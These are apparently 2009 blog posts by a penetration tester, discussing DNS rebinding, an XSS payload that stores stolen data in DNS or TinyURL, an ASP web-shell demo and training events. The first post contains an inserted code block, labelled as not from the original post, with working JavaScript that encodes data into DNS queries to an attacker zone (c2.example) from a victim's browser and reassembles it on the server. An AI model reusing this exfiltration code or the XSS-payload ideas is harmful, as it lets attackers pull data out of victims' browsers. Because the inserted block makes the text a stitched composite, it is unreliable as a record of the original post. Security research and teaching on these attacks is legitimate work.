Friday, January 30, 2009

Beyond DNS-rebinding

I've been spending a lot of time this month following and contemplating the material out there about DNS-rebinding and the assumptions made in how we browse the web. There's some really great content from rsnake and Kaminsky.

I've been working on a new FUSE-powered distributed filesystem that would work as an XSS payload. Think of it this way: instead of stashing your loot on your server or somebody else's--just continually juggle it between a few servers that allow for a little bit of public control. Say you had access to a couple of XSS-vulnerable servers. After a little bit of AJAX injected into the sites, as long as there is a catalyst (a browser hitting one of the vulnerable sites), you can maintain a basic filesystem. Even if it isn't a stored XSS vulnerability, you can still constantly refresh the pages to keep the files "stored." It works for DRAM, why not for this?

So how might we accomplish this? We could use the arbitrary TCP traffic mechanisms referenced in Kaminsky's presentation above, but that would require Flash alongside the JavaScript. Is there an easier way? Remember Kaminsky's extensive work on DNS tunneling? We could just use AJAX to trigger the DNS requests and stash our files in DNS the same way the DNS tunneling techniques do.

OK, so we could control DNS requests and, based on the timing of the responses, we could effectively "save" data. What other possibilities do we have? Some of the rebinding techniques are useful because the Same Origin Policy lets two sites that are considered part of the same domain share resources. Why bother with DNS? We have a great tool we can leverage to accomplish the same thing: TinyURL.
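To make the DNS idea concrete, here is an added example (mine, not code from the original post) of the encoding step a browser-side payload and the matching authoritative server would need. The write direction is the easy half: any cross-origin fetch or `new Image().src` forces the victim's resolver to look the name up, and the attacker's authoritative server for the zone sees the full query name even though the Same Origin Policy keeps the page from reading any HTTP response. Reading data back out of DNS is the harder half, since the browser never sees the answer contents and has to infer bits from timing or cache behaviour, which is why the post mentions response timing. The zone `c2.example` and the file id `f1` are placeholders; the byte payload in the test is constructed.

```javascript
// Added example (not from the original post): chunk a payload into DNS
// hostnames so that a victim browser's resolver carries it to an attacker-
// controlled authoritative server, then reassemble it from the query log.
// "c2.example" and the file id "f1" are placeholders, not real names.
const ZONE = 'c2.example';
const LABEL_MAX = 63;   // RFC 1035 label limit
const NAME_MAX = 253;   // FQDN text limit (255 on the wire incl. length bytes)
const SEQ_DIGITS = 6;   // fixed-width hex sequence number in every query
const LABEL_HEX = 62;   // even number of hex chars per data label (31 bytes)

// DNS is case-insensitive and resolvers may randomise case (0x20 encoding),
// so the data alphabet must survive case folding: hex, not base64.
// Each name is <hex>.<hex>...<seq>.<fileId>.<zone>, kept within both limits.
function encodeToNames(fileId, bytes, zone = ZONE) {
  const hex = Buffer.from(bytes).toString('hex');
  const suffixLen = 1 + SEQ_DIGITS + 1 + fileId.length + 1 + zone.length;
  // n data labels cost n*LABEL_HEX chars plus n-1 dots; fit as many as allowed
  const labelsPerName = Math.floor((NAME_MAX - suffixLen + 1) / (LABEL_HEX + 1));
  if (labelsPerName < 1) throw new Error('zone/file id leave no room for data');
  const hexPerName = labelsPerName * LABEL_HEX;
  const names = [];
  for (let off = 0, seq = 0; off < hex.length; off += hexPerName, seq++) {
    const chunk = hex.slice(off, off + hexPerName);
    const labels = [];
    for (let i = 0; i < chunk.length; i += LABEL_HEX) {
      labels.push(chunk.slice(i, i + LABEL_HEX));
    }
    const seqLabel = seq.toString(16).padStart(SEQ_DIGITS, '0');
    const name = `${labels.join('.')}.${seqLabel}.${fileId}.${zone}`;
    if (name.length > NAME_MAX || labels.some(l => l.length > LABEL_MAX)) {
      throw new Error('internal error: name exceeds DNS limits');
    }
    names.push(name);
  }
  return names;
}

// Browser side: the payload only needs to make the resolver look each name
// up; the HTTP request itself may fail or be blocked by the Same Origin
// Policy. In a browser `lookup` would be
//   n => { new Image().src = `http://${n}/`; }
// It is injected here so the function can be driven from Node.
function exfiltrate(fileId, bytes, lookup, zone = ZONE) {
  const names = encodeToNames(fileId, bytes, zone);
  names.forEach(lookup);
  return names.length;
}

// Server side: rebuild the file from the QNAMEs logged by the authoritative
// server. Tolerates out-of-order arrival, resolver retries (duplicates),
// case randomisation and unrelated queries for other names.
function decodeFromQueries(fileId, queries, zone = ZONE) {
  const suffix = `.${fileId}.${zone}`.toLowerCase();
  const chunks = new Map();
  for (const q of queries) {
    const name = q.toLowerCase().replace(/\.$/, '');   // drop trailing root dot
    if (!name.endsWith(suffix)) continue;              // not one of ours
    const labels = name.slice(0, -suffix.length).split('.');
    const seq = parseInt(labels.pop(), 16);
    if (Number.isNaN(seq) || !labels.every(l => /^(?:[0-9a-f]{2})*$/.test(l))) {
      continue;                                        // malformed, skip
    }
    chunks.set(seq, labels.join(''));                  // duplicates collapse
  }
  const seqs = [...chunks.keys()].sort((a, b) => a - b);
  // Gaps in the middle are detectable; a missing tail is not without an end
  // marker, so the caller decides when a burst is complete.
  for (let i = 0; i < seqs.length; i++) {
    if (seqs[i] !== i) throw new Error(`missing chunk ${i}`);
  }
  return Buffer.from(seqs.map(s => chunks.get(s)).join(''), 'hex');
}

module.exports = { encodeToNames, exfiltrate, decodeFromQueries };
```

With a two-character file id and this zone each query carries 93 bytes, so a few hundred bytes of "loot" costs a handful of lookups; the cost of the scheme is that every chunk is a distinct name that never caches, which is also what makes it loud in resolver logs.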

So I will be writing this up today to submit to the Black Hat CFP, and hopefully find time to code it somewhere between all of the events I'll be teaching/presenting at. Any thoughts or tips from any of you who might have been playing with this lately?

Friday, January 09, 2009

Sometimes simpler is better

I gave a presentation on Essential Pentesting Methodology last night at the monthly SoCalITPro meeting. It was a last-minute event, but it went very well and a lot of IT folks got a lean and mean introduction to the issues that surround a successful penetration test.

We also demonstrated an ASP code injection. We had a simple ASP app that wrote files with little input filtering, so one could write their own ASP pages remotely. We were running commands and talked about how we could build an ASP shell into the web page itself (have you ever seen PHPShell?). Since we were demonstrating without a formal example, I ended up hacking together an ASP shell script and put it at I wasn't going to bother publishing it since exists, but after checking it out I realized it's a little more complicated than necessary and I was unable to use it for the ASP code injection demonstration I'm cooking up for Core Security's January 22nd webcast. Thought somebody might find this one useful. Update: Sorry, that link was originally to another webcast Core is hosting; I've corrected the link.

BTW, there is still room for a few people at the SANS Security 560 Network Penetration Testing with bootcamp. Please email me if you missed the discount code.

Friday, January 02, 2009

Starting 2009 off with a free webcast

I'll be spending a lot of development time in January, then teaching quite a few classes in February. On January 22nd I'll be contributing to Core Security's Comprehensive Penetration Testing webcast. I'll be demonstrating some custom modules and incorporating them into Core's IMPACT Pro software. During the free webcast you will be able to see a discount code that will get you 10% off any SANS Sec 560 course.

February starts off with SANS Security 560 in Atlanta, GA and Los Angeles, CA. I'll be giving a presentation on Custom File Systems at SCALE, and also teaching SANS Security 504 in Edmonton, AB. See for the links and more info.

I hope to announce my personal pet project for 2009 in the next couple of months, but here's a hint: yet another cool JavaScript payload to use in cross-site-style attacks. Hoping it works out well enough that I can speak at a few security conferences this year about it.